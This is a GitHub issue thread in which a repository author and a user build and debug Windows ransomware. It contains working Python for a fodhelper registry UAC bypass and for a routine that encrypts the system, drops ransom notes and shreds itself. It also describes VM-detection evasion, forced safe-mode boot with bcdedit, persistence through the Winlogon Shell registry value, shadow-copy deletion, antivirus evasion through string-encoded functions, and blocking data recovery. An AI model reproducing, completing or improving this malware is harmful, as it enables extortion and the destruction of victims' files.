### ISSUE TITLE
Working with it in a VM

### ISSUE THREAD

**Issue by Liam6791sadasd** [Senc3951/Ransomware#2]
So, if I run this in a VM, will it still work around the VM and do stuff on my actual PC? Or did I read code wrong/misunderstand. (safe or not to test on VM?)

**Comment by Senc3951** [comment]
It will be safe to run it on VM, but it shouldn't run there because of the checks I made, so you will need to disable that first

**Comment by Senc3951** [comment]
In matter of fact, I never tested it on VM, so I can't tell for sure what will happen but I know that nothing will happen to your main PC because I never made this ability

**Comment by Liam6791sadasd** [comment]
Ah okay. I will test it later on an let you know if the VM part of it works then, and I appreciate the response.

**Comment by Senc3951** [comment]
Thanks

**Comment by Liam6791sadasd** [comment]
working on adding a thing to your code, as I am bored.  i will let you know if it works on a VM once i get that working.

**Comment by Liam6791sadasd** [comment]
another thing, im getting errors with pylance. 
![image](https://user-images.githubusercontent.com/94421761/142080495-92e57bc0-eee4-43a9-824a-bde57678934e.png)

ive imported all things, did a even reinstalled pip and a couple other things, didnt work. any ideas?

**Comment by Senc3951** [comment]
According to the errors, try creating a new folder and put all of the files there and reopen on vscode, it can happen from some reason.

And for the decryption, I'll add this feature today I guess

**Comment by Liam6791sadasd** [comment]
Yeah, I fixed the errors, forget what I had to do. Thanks.

**Comment by Liam6791sadasd** [comment]
Seems like the VM evasion part works. Upon running the program, it says "HTTP Error 404: Not Found", so I am assuming that means it is working as it is not encrypting files.

**Comment by Senc3951** [comment]
HTTP ERROR 404: have no idea, didn't do anything with websites.
evasion: should still Implement

encryption:
the program finds out that it's the first time you run this program on the machine because you don't have certain files on your computer, so it writes itself to the registry and reboots into safe mode. the problem is that it requires administrative privileges, which is probably why it didn't work (reboot).

Once it's on safe mode, the encryption should start.

**Comment by Senc3951** [comment]
Also please download know the repository again, I fixed some stuff.

**Comment by Liam6791sadasd** [comment]
> HTTP ERROR 404: have no idea, didn't do anything with websites. evasion: should still Implement
> 
> encryption: the program finds out that it's the first time you run this program on the machine because you don't have certain files on your computer, so it writes itself to the registry and reboots into safe mode. the problem is that it requires administrative privileges, which is probably why it didn't work (reboot).
> 
> Once it's on safe mode, the encryption should start.

Understood. Question though, is there a way to make it run with administrative privileges without the user manually doing it?

And so it will reboot on it's own if ran with admin privileges?

**Comment by Liam6791sadasd** [comment]
I believe I have just made it run with administrative privileges, will test now.

**Comment by Senc3951** [comment]
My idea is that you removed something while adding your stuff, because when I tested the encryption part on random folders it worked.

Try downloading the repository as I also committed something yesterday, and compare to yours. Also when you run it, you compile it to exe?

**Comment by Senc3951** [comment]
I believe I fixed the issue, I had a typo that also exists and that's why it didn't showed the error.

**Comment by Liam6791sadasd** [comment]
I will show you now.

`def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

if is_admin():

    e = evador()
    ran = ransomware(False)
    current_path = os.path.abspath(__file__)

    def start_ransomware():
        print("Generating keys...")
        input()
        ran.generate_keys()
        ran.generate_fernet()
    
        print("Encrypting the data...")
        input()
        ran.encrypt_system()
        ran.delete_keys()
    
        print("Adding notes to the user")
        input()
        ran.add_notes()
    
        print("Deleting ourself from the system")    
        input()
        delete_file(current_path)

    def delete_file(path):
        if os.path.exists(path) and os.path.isfile(path):
            ran.shred_file(path)

else:
    # Re-run the program with admin rights
    ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv[1:]), None, 1)`

^^^ Main.py

When running the program, it will prompt you to run with administrative privileges, and  it won't run if you say no.

**Comment by Senc3951** [comment]
Did the encryption part worked?

**Comment by Liam6791sadasd** [comment]
Yeah, it did. Good job! I've just gotta finish adding the stuff that I'd like to add, and will be done. Appreciate the help. I'll leave this comment open just in case.

**Comment by Senc3951** [comment]
Thanks, I believe I implemented a better bypass because your's didn't work for me. try mine, and if you can launch it from the start to the end and tell me what happened.

**Comment by Liam6791sadasd** [comment]
Will do, sorry for a late response.

**Comment by Liam6791sadasd** [comment]
I will test in about 2-3 hours, and let you know.

**Comment by Liam6791sadasd** [comment]
The UAC bypass is detected by Windows Defender, so upon running it, I have to do a couple things to get it working again. Will continue testing, but hopefully you can try to allow the UAC bypass to bypass the windows AV.

**Comment by Senc3951** [comment]
That's the point, it closes the original one and continues running on the newly opened cmd with administrative privileges

**Comment by Senc3951** [comment]
The AV doesn't matter because the evasion part takes 3 seconds approximately... (I want to remove the mouse part) and then it's game over

**Comment by Liam6791sadasd** [comment]
I know that's the point, but it opens a new admin CMD windows, but doesn't continue running.

**Comment by Senc3951** [comment]
Can you show, it worked for me...

**Comment by Liam6791sadasd** [comment]
Yeah, one minute

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142592521-f8ddb19b-3160-48b6-a319-f4a031f9eece.png)
downloaded

I ran it, and then it said the trying to bypass UAC or something like that, then it says 
![image](https://user-images.githubusercontent.com/94421761/142592648-5d59af67-f057-4f2c-850f-d1f49cdb770c.png)
 in the admin CMD

**Comment by Liam6791sadasd** [comment]
Which is weird, since it's an exe, it wouldn't need python to be installed. Yesterday I did not get any errors though.

**Comment by Senc3951** [comment]
That happens because when I tested it I didn't compile it but executed as py file so I used python. When building you need to remove PYTHON_CMD

**Comment by Liam6791sadasd** [comment]
> That happens because when I tested it I didn't compile it but executed as py file so I used python. When building you need to remove PYTHON_CMD

So it should work if i remove that?

**Comment by Senc3951** [comment]
Yep

**Comment by Senc3951** [comment]
Because what happens is that in the administrator cmd I run the program again, and in my case it was with python not an executable

**Comment by Senc3951** [comment]
So for testing I would use python, when building just remove it

**Comment by Liam6791sadasd** [comment]
Alright, ill test it and let you know

**Comment by Liam6791sadasd** [comment]
It'll close CMD, since Windows Defender detected the bypass, I'm going to turn it off and test again.

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142595462-30a8a15b-65fc-4a0d-a84e-5c18ee353906.png)
Says this upon opening the CMD

**Comment by Liam6791sadasd** [comment]
For which file, uac_bypass?

**Comment by Senc3951** [comment]
yes

**Comment by Liam6791sadasd** [comment]
```
import os
import sys
import winreg
import ctypes

class uac_bypass:
    CMD = r"C:\Windows\System32\cmd.exe"
    FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
    #PYTHON_CMD = "python"
    REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
    DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

    def __init__(self, target:str):
        if (os.path.exists(target) and os.path.isfile(target)):
            self.target_file = target
        else:
            self.target_file = os.path.abspath(__file__)

    def is_running_as_admin(self):
        try:
            return os.getuid() == 0
        except AttributeError:
            return ctypes.windll.shell32.IsUserAnAdmin() != 0

    def create_reg_key(self, key, value):
        try:        
            winreg.CreateKey(winreg.HKEY_CURRENT_USER, self.REG_PATH)
            registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, self.REG_PATH, 0, winreg.KEY_WRITE)                
            
            winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
            winreg.CloseKey(registry_key)
        except WindowsError:        
            raise

    def bypass_uac(self, cmd):
        try:
            self.create_reg_key(self.DELEGATE_EXEC_REG_KEY, '')
            self.create_reg_key(None, cmd)    
        except WindowsError:
            raise

    def bypass(self):
        if not self.is_running_as_admin():
            print("This script is NOT running with administrative privileges")
            print("Trying to bypass the UAC")
            
            try:
                cmd = "{} /k {} \"{}\"".format(self.CMD, self.target_file, """self.PYTHON_CMD""")
                self.bypass_uac(cmd)
                
                os.system(self.FOD_HELPER)
                sys.exit(0)
            except WindowsError:
                sys.exit(1)
        else:
            return 1
```

**Comment by Liam6791sadasd** [comment]
Haven't changed a thing, other than commenting out the python cmd

**Comment by Senc3951** [comment]
try putting this line instead of yours:                 
cmd = "{} /k \"{}\"".format(self.CMD, self.target_file)

**Comment by Senc3951** [comment]
this one sorry:                 cmd = "{} /k \"{}\"".format(self.CMD, self.target_file)

**Comment by Senc3951** [comment]
wait

**Comment by Senc3951** [comment]
![image](https://user-images.githubusercontent.com/44588965/142596133-d2a32d59-1ffd-48e3-b459-2da4bb5a84ca.png)
this one

**Comment by Liam6791sadasd** [comment]
okay, one sec.

**Comment by Liam6791sadasd** [comment]
still says the same thing, the uac_bypass.pyc error.

**Comment by Senc3951** [comment]
in the main file, you did like this: 
    current_path = os.path.abspath(__file__)
    
    evad = evador()
    ransom = ransomware()
    uac = uac_bypass(current_path)

**Comment by Liam6791sadasd** [comment]
yes, that is what it looks like.

**Comment by Senc3951** [comment]
it seems that from some reason, the target_file is not pointing to the executable 
can you just in case print self.target_file

**Comment by Liam6791sadasd** [comment]
trying now

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142598179-a49336dc-68ef-4406-ab71-04a6ed8c737a.png)

**Comment by Senc3951** [comment]
can you try compiling it as one exe file and not a directory

**Comment by Liam6791sadasd** [comment]
how exactly would i do that? to compile it, i just type `pyinstaller -F main.py`

**Comment by Senc3951** [comment]
--onefile

**Comment by Liam6791sadasd** [comment]
alright, i forgot about --onefile, thanks. im too tired, 4:33 am for me right now. will try that now

**Comment by Senc3951** [comment]
you should sleep some time

**Comment by Liam6791sadasd** [comment]
I will, just want to get this done first.

**Comment by Liam6791sadasd** [comment]
it still says the same thing, even using --onefile.

**Comment by Senc3951** [comment]
I've changed the code, moved uac_bypass to main, perhaps it will work now, if no I'll just look into that later
Download main again, remove uac_bypass and notice the comment in bypass function inside main

**Comment by Liam6791sadasd** [comment]
alright, will try now

**Comment by Senc3951** [comment]
I would also recommend removing the __pycache__ folder

**Comment by Liam6791sadasd** [comment]
Okay, will do, soon. Gonna try and get some rest. I'll talk to you later and let you know if it worked.

**Comment by Senc3951** [comment]
sure, good night i guess

**Comment by Liam6791sadasd** [comment]
I'm back, doing testing now.

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142626464-7179a79d-993c-4509-a161-95fd27921d08.png)
says this now

**Comment by Senc3951** [comment]
Cause you probably didn't comment the line in the bypass function in main

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142627336-5b5b1896-3645-40df-8859-3cb9bdf46623.png)
gonna see if that works, its a bit different.

**Comment by Liam6791sadasd** [comment]
I did, I made sure I did/

**Comment by Liam6791sadasd** [comment]
What I did made a difference, but not a very good one. 
![image](https://user-images.githubusercontent.com/94421761/142627967-92c8f320-69e8-4d63-a474-51fd55df4911.png)
Pretty much the same, different folder

**Comment by Senc3951** [comment]
Can you show me the bypass function

**Comment by Senc3951** [comment]
Ohh wait, do you run it as exe or as .py?

**Comment by Liam6791sadasd** [comment]
```
    def bypass_uac(self, cmd):
        try:
            self.create_reg_key(self.REGISTRY_NAME, '')
            self.create_reg_key(None, cmd)    
        except WindowsError:
            raise

    def bypass(self):
        if not self.is_running_as_admin():
            print("This script is NOT running with administrative privileges")
            print("Trying to bypass the UAC")
            
            try:
                #When building uncomment this line, and comment the second one
                command = "{} /k \"{}\"".format(self.CMD_PATH, self.target_file)
                #command = "{} /k {} \"{}\"".format(self.CMD_PATH, self.PYTHON, self.target_file)
                self.bypass_uac(command)
                
                os.system(self.FOD_HELPER)
                sys.exit(0)
            except WindowsError:
                sys.exit(1)
        else:
            return 1
```

**Comment by Liam6791sadasd** [comment]
EXE

**Comment by Liam6791sadasd** [comment]
since its being tested on a VM, using .py would take forever, because I'd have to install python over and over again, where with exe i can just set up a new VM, and download it.

**Comment by Senc3951** [comment]
Current_path must contain the entire path of the file, and can you print target file to see what's passed there

**Comment by Liam6791sadasd** [comment]
just trying to `print(target_file)` gives me an error, saying its not defined because its in a different function. what can I do?

**Comment by Liam6791sadasd** [comment]
I'm dumb, i forgot to put self. infront of target_file. will test now

**Comment by Liam6791sadasd** [comment]
target file is the downloads folder, where im running it from.

**Comment by Senc3951** [comment]
And what about I did for current path and not what you did

**Comment by Liam6791sadasd** [comment]
Will try now, and show you what the current path is

**Comment by Liam6791sadasd** [comment]
Both lead back to the downloads folder, where I am running the exe from.

**Comment by Senc3951** [comment]
Including the file name?

**Comment by Liam6791sadasd** [comment]
No, just the path to the folder where I am running it, not with the file name

**Comment by Senc3951** [comment]
Let me check that

**Comment by Liam6791sadasd** [comment]
Alright

**Comment by Liam6791sadasd** [comment]
Any luck?

**Comment by Senc3951** [comment]
I've been seating on this for a long time, saw some documentations but eventually switched to sys.argv[0], and it worked like a charm.

Also even though the AV detects the UAC bypass, that the user can't do a thing because the evasion part takes ~2 seconds, and then the computer reboots and it's game over.

**Comment by Senc3951** [comment]
download the main.py, compile and it'll work

**Comment by Liam6791sadasd** [comment]
will try now

**Comment by Liam6791sadasd** [comment]
testing now

**Comment by Liam6791sadasd** [comment]
it's working, except it doesnt restart the computer on its own

**Comment by Senc3951** [comment]
I noticed that and I don't know why, although if you'll restart the computer you will see it opens on safe mode

**Comment by Liam6791sadasd** [comment]
Yeah I know, I've tested that bit. i want it to restart my VM though, so i'll try and figure a way around it.

**Comment by Liam6791sadasd** [comment]
Not working now. It seems to work fine when adding to startup for the most part, but upon restart and having it in safe mode, running the program again seems to have no effect, and it says that it has not been ran, and then does not start encryption.

**Comment by Liam6791sadasd** [comment]
No errors in CMD either

**Comment by Liam6791sadasd** [comment]
alright, one min. need to set up a new VM

**Comment by Liam6791sadasd** [comment]
Give me like 10 more mins, busy helping a friend.

**Comment by Senc3951** [comment]
I'm not going anywhere

**Comment by Liam6791sadasd** [comment]
alright

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142650663-c9dcee40-d01e-45e3-afb0-ac0fb790d4c5.png)
says this every time i run it...

**Comment by Senc3951** [comment]
it means that it found out you are running on VM, just disable the checks

**Comment by Liam6791sadasd** [comment]
I did. Still says that.

**Comment by Senc3951** [comment]
![Screenshot 2021-11-19 175156](https://user-images.githubusercontent.com/44588965/142651872-bd3f145c-d156-47ce-94c9-f639c1689b07.png)
remove what is inside the lines

**Comment by Senc3951** [comment]
because that is the only condition that cause's that print statement

**Comment by Liam6791sadasd** [comment]
alright, will try that

**Comment by Liam6791sadasd** [comment]
will update you once I get it working again

**Comment by Senc3951** [comment]
ok

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142653364-80fa838d-2a34-4d85-91f7-0d04c8c706c6.png)
 upon removing what you told me to remove

**Comment by Liam6791sadasd** [comment]
startup is a thing i added, but it shouldnt be giving errors either.

**Comment by Senc3951** [comment]
show me the code where startup is

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142654023-d4f64abd-98ba-4077-b0ab-541890805e4d.png)

**Comment by Senc3951** [comment]
show me where you call startup

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142654312-51673ccd-9d63-4297-b608-3683a055dd3a.png)

**Comment by Senc3951** [comment]
Well you forgot to put self as argument in startup function

**Comment by Liam6791sadasd** [comment]
startup is meant to work better than the one that you implemented, since it would run on startup (when booting into safe mode.)

**Comment by Liam6791sadasd** [comment]
> Well you forgot to put self as argument in startup function

oops, didnt even think of that lol, sorry.

**Comment by Liam6791sadasd** [comment]
It's all working now. It restarts on its own, everything. One single problem though. When using the startup function that i've added, it won't start  the app on startup (since it is in safe mode). There is a way to bypass this, but I am unsure how. Any ideas?

**Comment by Senc3951** [comment]
Have you tried my startup function?

**Comment by Liam6791sadasd** [comment]
It's meant to use both startup functions, meaning that neither work when it comes to startup in safe mode.

**Comment by Senc3951** [comment]
Can you manually open safe mode and run the program but without the restart, only the encryption to see if it's working. If yes I'll know the  only missing think is the startup

**Comment by Liam6791sadasd** [comment]
Encryption works fine

**Comment by Senc3951** [comment]
With AV?

**Comment by Liam6791sadasd** [comment]
unsure, havent tried it with windows defender on

**Comment by Senc3951** [comment]
Make sure to test it on safe mode without network connection

**Comment by Liam6791sadasd** [comment]
so run it again, and make sure my internet is turned off?

**Comment by Senc3951** [comment]
There's ability to open safe mode without internet connection, that's what I do in the ransomware
Look for the command in open safe mode method

**Comment by Liam6791sadasd** [comment]
> Make sure to test it on safe mode without network connection

i test it how it is in the code, safe mode without connection

**Comment by Senc3951** [comment]
Write bcdedit /set {default} safeboot minimal
 in cmd, and then restart

**Comment by Liam6791sadasd** [comment]
> Write bcdedit /set {default} safeboot minimal in cmd, and then restart

thats what you put in the code. i run the code, the pc restarts and it boots into safe mode without connection. thats it

**Comment by Senc3951** [comment]
No try the encryption with av

**Comment by Liam6791sadasd** [comment]
will do

**Comment by Liam6791sadasd** [comment]
setting another VM up now, like the 14th one. i will keep the av on while running the exe, but the problem is that Microsoft Defender detects the UAC bypass, so it wont run it from what I've found. Should i try with it on anyways?

**Comment by Senc3951** [comment]
Yes but the av isn't worth a thing because when I do the uac then it opens a new windows on a new process and closes the old one, so the av warns about a program that has already closed.
At least it's like this when I tested it

**Comment by Senc3951** [comment]
And can't you make a restore point, instead of doing the whole thing over and over

**Comment by Liam6791sadasd** [comment]
ah okay. Didn't even think about a restore point, kinda stupid of me, i am only running on 3-4 hours of sleep. thanks, will try now.

**Comment by Senc3951** [comment]
You've got to sleep more...

**Comment by Liam6791sadasd** [comment]
I do, yeah. Also, yes, it does still encrypt with the av turned on after restart and booting into safe mode.

**Comment by Liam6791sadasd** [comment]
Still, only thing that is left is to bypass safe mode to run the program on startup

**Comment by Senc3951** [comment]
Great

**Comment by Senc3951** [comment]
Also, I forgot to ask, after the encryption, you can still explore around, right? I mean nothing connected to the system didn't get destroyed...

**Comment by Liam6791sadasd** [comment]
I can do anything, all works fine. Why? My main PC seems fine, and in the vm it allows me to expore around after encryption

**Comment by Senc3951** [comment]
good, because when I included so many file extensions to encrypt, I was afraid it will affect the system

**Comment by Liam6791sadasd** [comment]
Yeah same, was wondering that too, all is fine though.

**Comment by Liam6791sadasd** [comment]
Any luck yet? Or are you not working on it? If not, I can try, but am not sure if I'd be able to.

**Comment by Senc3951** [comment]
You can try, I'm also looking at it

**Comment by Senc3951** [comment]
When the encryption ends, does a ransom note appear and the wallpaper changes?

**Comment by Liam6791sadasd** [comment]
Just the note, wallpaper is black upon starting in safe mode.

**Comment by Liam6791sadasd** [comment]
And it doesn't change

**Comment by Senc3951** [comment]
Ok, forgot about that

**Comment by Liam6791sadasd** [comment]
I honestly cannot figure out a way to bypass safe mode for startup. I've gotta go out and do a few things, cya later.

**Comment by Senc3951** [comment]
Cya

**Comment by Liam6791sadasd** [comment]
I'm back, any luck?

**Comment by Senc3951** [comment]
not rly

**Comment by Liam6791sadasd** [comment]
damn

**Comment by Senc3951** [comment]
I think i found it: 
this is the reg responsible for safe mode startup
CurrentControlSet\Control\SafeBoot\Minimal\Network

**Comment by Senc3951** [comment]
or HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

**Comment by Senc3951** [comment]
check now, I've updated the repository

**Comment by Senc3951** [comment]
it will still won't work, need more fixes

**Comment by Liam6791sadasd** [comment]
I'll check once you fix, but hopefully it works.

**Comment by Senc3951** [comment]
should work now, try

**Comment by Liam6791sadasd** [comment]
Will do, give me another 5 minutes or so to try it though.

**Comment by Liam6791sadasd** [comment]
Downloading and testing on the VM now.

**Comment by Senc3951** [comment]
any news?

**Comment by Liam6791sadasd** [comment]
Not yet, sorry. Having loads of internet issues. Will try in a second.

**Comment by Liam6791sadasd** [comment]
well this sucks. the vm decided to update windows while the program restarted it. we'll be here for a bit. ill update you once i get something.

**Comment by Senc3951** [comment]
ok

**Comment by Liam6791sadasd** [comment]
It does not run on startup while in safe mode.

**Comment by Liam6791sadasd** [comment]
Upon running it in safe mode (after being run the first time), it doesn't detect that it has been ran, and restarts the PC again. Maybe its my fault (from the windows update), im going to try something and let you know.

**Comment by Liam6791sadasd** [comment]
Tested again, it is the scripts fault.

**Comment by Senc3951** [comment]
Can you open the reg I specified in ransomware.py to check for the value there, the default should be explorer.exe

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142736448-9dca4d63-7a42-4e09-a1c0-c102038056d8.png)

**Comment by Senc3951** [comment]
The reg doesn't exist from some reason

**Comment by Liam6791sadasd** [comment]
Weird.

**Comment by Senc3951** [comment]
Try local machine and not current user on the reg editor

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142736679-24ddb394-8f60-43c5-a8dc-cb9540528d1e.png)
as far as i can get

**Comment by Liam6791sadasd** [comment]
oops, wrong path

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142736774-1502f547-b0cd-44d2-bad5-936e8a3d0711.png)

**Comment by Senc3951** [comment]
Then the app didn't write to that reg, can you try executing again

**Comment by Senc3951** [comment]
Or you can try manually setting the value of the reg to the path of the file and restart in safe mode

**Comment by Liam6791sadasd** [comment]
> Or you can try manually setting the value of the reg to the path of the file and restart in safe mode

Haven't really worked with the registry editor before, how would I go about doing that?

**Comment by Senc3951** [comment]
Open the reg like you did, find She'll in the path I specified in the ransomware and double click on Shell. It will ask for value, put to full path of the exe file

**Comment by Senc3951** [comment]
![IMG_20211120_204557](https://user-images.githubusercontent.com/44588965/142737721-4d803e1b-f2b7-4462-8b4d-24275df09c1d.jpg)
Double click on that and set the value

**Comment by Senc3951** [comment]
![IMG_20211120_204557](https://user-images.githubusercontent.com/44588965/142737744-34590095-065b-46c7-97a6-9d4713ad7d45.jpg)
Double click and set the value

**Comment by Liam6791sadasd** [comment]
it changed the value from explorer.exe to a the folder. is that what is meant to happen?

**Comment by Senc3951** [comment]
It should be the complete path, you can copy it in the file browser

**Comment by Liam6791sadasd** [comment]
I did, will try now.

**Comment by Liam6791sadasd** [comment]
Now it says it has been executed, so that was the problem. Need to find a way to fix that bit. It encrypting data now

**Comment by Senc3951** [comment]
On safe mode?

**Comment by Liam6791sadasd** [comment]
It does take a while to encrypt though, even though it is only 3 files to encrypt. Maybe there is a way to make it faster, something like threading or something.

**Comment by Liam6791sadasd** [comment]
> On safe mode?

Yes

**Comment by Senc3951** [comment]
I already use threading, but it takes time because it enumerates the entire C directoey

**Comment by Senc3951** [comment]
I could encrypt first the documents,downloads directory

**Comment by Liam6791sadasd** [comment]
Fair. Is there also a way to hide the console while doing the encryption? (or really any part of the process?)

**Comment by Liam6791sadasd** [comment]
> I could encrypt first the documents,downloads directory

Yeah. It does encrypt all files there, which is good.

**Comment by Senc3951** [comment]
Yep, I already implemented that but for now I show the console for testing, thats just a parameter in main, look for the run method in main

**Comment by Liam6791sadasd** [comment]
Ah okay, thanks. So I think all that needs done is to make sure it writes to the registry properly, and it should be good.

**Comment by Senc3951** [comment]
Yep

**Comment by Senc3951** [comment]
I think I know what caused the problem, uploading the solution rn.

**Comment by Liam6791sadasd** [comment]
Will test in a few minutes.

**Comment by Liam6791sadasd** [comment]
Internet problems still, will update you in a minute.

**Comment by Liam6791sadasd** [comment]
Doesn't work at all. Windows defender detects the UAC bypass and shuts the program down. If running without AV, it doesn't work. Bypasses UAC, opens admin cmd prompt, but doesn't run anything afterwards.

**Comment by Senc3951** [comment]
can you show the exception? if the command closes immediately just span Windows + PtScn to scrreenshot

**Comment by Liam6791sadasd** [comment]
It doesn't close immediately, and it doesn't show anything. the command prompt opens, and waits for input. doesnt run code or anything it seems like. Will try one more time

**Comment by Liam6791sadasd** [comment]
Am trying again without AV

**Comment by Liam6791sadasd** [comment]
Does the same thing

**Comment by Senc3951** [comment]
Thought I fixed it but ruined it more lol

**Comment by Liam6791sadasd** [comment]
lol yeah

**Comment by Senc3951** [comment]
hi, I believe I fixed it, give it a try

**Comment by Liam6791sadasd** [comment]
Hey. Sorry, didn't see the response. I'm honestly quite busy today, once I get a chance I gladly will and let you know how it goes :)

**Comment by Senc3951** [comment]
Sure

**Comment by Liam6791sadasd** [comment]
Hey again, sorry. Still busy. Will get around to trying it in around 20 minutes hopefully.

**Comment by Liam6791sadasd** [comment]
compiling it now, will update you in a few minutes :)

**Comment by Liam6791sadasd** [comment]
Got an error, will try to get it again.

**Comment by Senc3951** [comment]
What error

**Comment by Liam6791sadasd** [comment]
unsure, its a console error. will try to get a screenshot

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/142921104-b08158bd-207c-4713-b456-b5dfecaefd3f.png)

**Comment by Liam6791sadasd** [comment]
That is the error, hasn't been touched.

**Comment by Senc3951** [comment]
Just change it to the functions name, it's persist something

**Comment by Liam6791sadasd** [comment]
I don't see anything about 'write_to_registry' in the code whatsoever. did you accidentally remove it?

**Comment by Senc3951** [comment]
I changed the name, it's now become_persistent

**Comment by Liam6791sadasd** [comment]
Ah okay, will fix now.

**Comment by Liam6791sadasd** [comment]
A lot better than before. It starts on safe mode, and disables you from using anything whatsoever, only the file explorer is usable, everything works now.

**Comment by Senc3951** [comment]
Great, working on some couple improvements... Can you try downloading what I published now

**Comment by Senc3951** [comment]
You won't see a difference but I changed the code, so I don't know how it will work

**Comment by Liam6791sadasd** [comment]
One thing, it takes way longer to encrypt than before. I think it is stuck on encrypting.

**Comment by Liam6791sadasd** [comment]
Another thing, you should work on making it disable task manager.

**Comment by Senc3951** [comment]
I plan to do that

**Comment by Liam6791sadasd** [comment]
Alrighty. I will use the new code in a minute, just doing a few things.

**Comment by Liam6791sadasd** [comment]
Ah okay. Will test it all in like 5-10 mins, and will let you know how it goes.

**Comment by Liam6791sadasd** [comment]
It did not restart the pc, and it said this: 
![image](https://user-images.githubusercontent.com/94421761/142926004-9094db03-28fb-4bca-9145-f542e8126220.png)

**Comment by Senc3951** [comment]
Well I've got stuff to do

**Comment by Senc3951** [comment]
i fixed it now

**Comment by Liam6791sadasd** [comment]
Will test later. Am busy and am having internet issues.

**Comment by Senc3951** [comment]
Sure

**Comment by Liam6791sadasd** [comment]
Sorry, am still working on stuff. Will get back to you later, hopefully.

**Comment by Senc3951** [comment]
how is it going

**Comment by Liam6791sadasd** [comment]
Will do, hopefully within the next hour or two.

**Comment by Senc3951** [comment]
i've implemented the decryption ability

**Comment by Liam6791sadasd** [comment]
Sounds good, I am so sorry about not being able to do this. I will certainly test within the next hour.

**Comment by Liam6791sadasd** [comment]
So quick question, how do you go about decryption?

**Comment by Senc3951** [comment]
Call decrypt method inside main

**Comment by Liam6791sadasd** [comment]
Okay, I've got an idea for it, will try later on.

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/143660565-1f4f9491-d705-4d9d-8e8a-ff263e039b30.png)
getting this error.

**Comment by Senc3951** [comment]
fixed it

**Comment by Liam6791sadasd** [comment]
Righty, will test in a few :)

**Comment by Liam6791sadasd** [comment]
sorry, testing now.

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/143729037-de183671-7fd6-40fd-a8f5-299f7364a64c.png)

**Comment by Senc3951** [comment]
fixed

**Comment by Liam6791sadasd** [comment]
right, will test in about an hour.

**Comment by Senc3951** [comment]
i have drastically reduced the encryption time, check It out when you can (from 4min to ~1.5)

**Comment by Liam6791sadasd** [comment]
Perfect. Checking in about 20 minutes

**Comment by Liam6791sadasd** [comment]
![image](https://user-images.githubusercontent.com/94421761/143783677-91d3e0bf-ba74-430b-b162-e5f7f8fe7ff1.png)
also, gotta try something else, i messed it up.

**Comment by Senc3951** [comment]
Ohh the delete those two lines in main

**Comment by Senc3951** [comment]
Or just wait 1 min, I'll fix it

**Comment by Liam6791sadasd** [comment]
Don't worry about  it, I deleted it. Compiling now, gonna test soon.

**Comment by Senc3951** [comment]
well?

**Comment by Liam6791sadasd** [comment]
sorry. Give me about 20 minutes, ill get back to you soon. am trying to fix something

**Comment by Senc3951** [comment]
sure

**Comment by Liam6791sadasd** [comment]
getting an error, but rn im too lazy to see what it is. am kinda busy today

**Comment by Liam6791sadasd** [comment]
Hey man. Sorry about not replying much. I'm back now, I've got a bit of time. Will test now, sorry.

**Comment by Senc3951** [comment]
It's fine everyone have life... Thanks for answering him

**Comment by Liam6791sadasd** [comment]
No problem. I'll get back to testing soon, had an error but got busy again.

**Comment by Senc3951** [comment]
what error

**Comment by Liam6791sadasd** [comment]
unsure, will try to get it later on when im free

**Comment by Liam6791sadasd** [comment]
Alright, im back. Got a screenshot of the error: 
![image](https://user-images.githubusercontent.com/94421761/144746611-78a266f1-a3bb-4bcb-9746-5ca13dff9220.png)

Also, it no longer starts on startup and it no longer disables everything other than task manager.. The shadow copy one is easy, the two lines in main just need deleted, which I can do later on, unless you do that with the next fix.

**Comment by Senc3951** [comment]
This is an old instance of the project, try download the new one

**Comment by Liam6791sadasd** [comment]
Ahh okay, will try in a bit.

**Comment by Liam6791sadasd** [comment]
Hey man, I'm so sorry about not working with this. I will most certainly try it soon, give me at least 30 minutes and I'll tell you about any errors I encounter.

**Comment by Liam6791sadasd** [comment]
Oh, and quick question. With the new file (first_payload), do I compile that one, and it downloads the actual files and run them? And how does it go about downloading the file?

**Comment by Liam6791sadasd** [comment]
Nvm, I'm special. I understand how it downloads the file, I just didn't pay attention. I'm assuming that I do just compile the first_payload.py and continue on?

**Comment by Liam6791sadasd** [comment]
Question, why is the download_file() function commented out?

**Comment by Liam6791sadasd** [comment]
i'm special. Ignore my stupidity, I am too tired. I've got it figured out, let me test

**Comment by Senc3951** [comment]
Function as string to bypass certain AV, common technique among ransomware s...

**Comment by Liam6791sadasd** [comment]
With the new update to the ransomware, how does it work?

**Comment by Senc3951** [comment]
The major update is about encryption, and not allowing to restore the data. working on server and decrypter... I added a link in the readme about how the encryption works, but you shouldn't see a difference when running the program

**Comment by Liam6791sadasd** [comment]
ah okay.

**Comment by Senc3951** [comment]
Did you check it?

**Comment by Liam6791sadasd** [comment]
not yet, will do so later
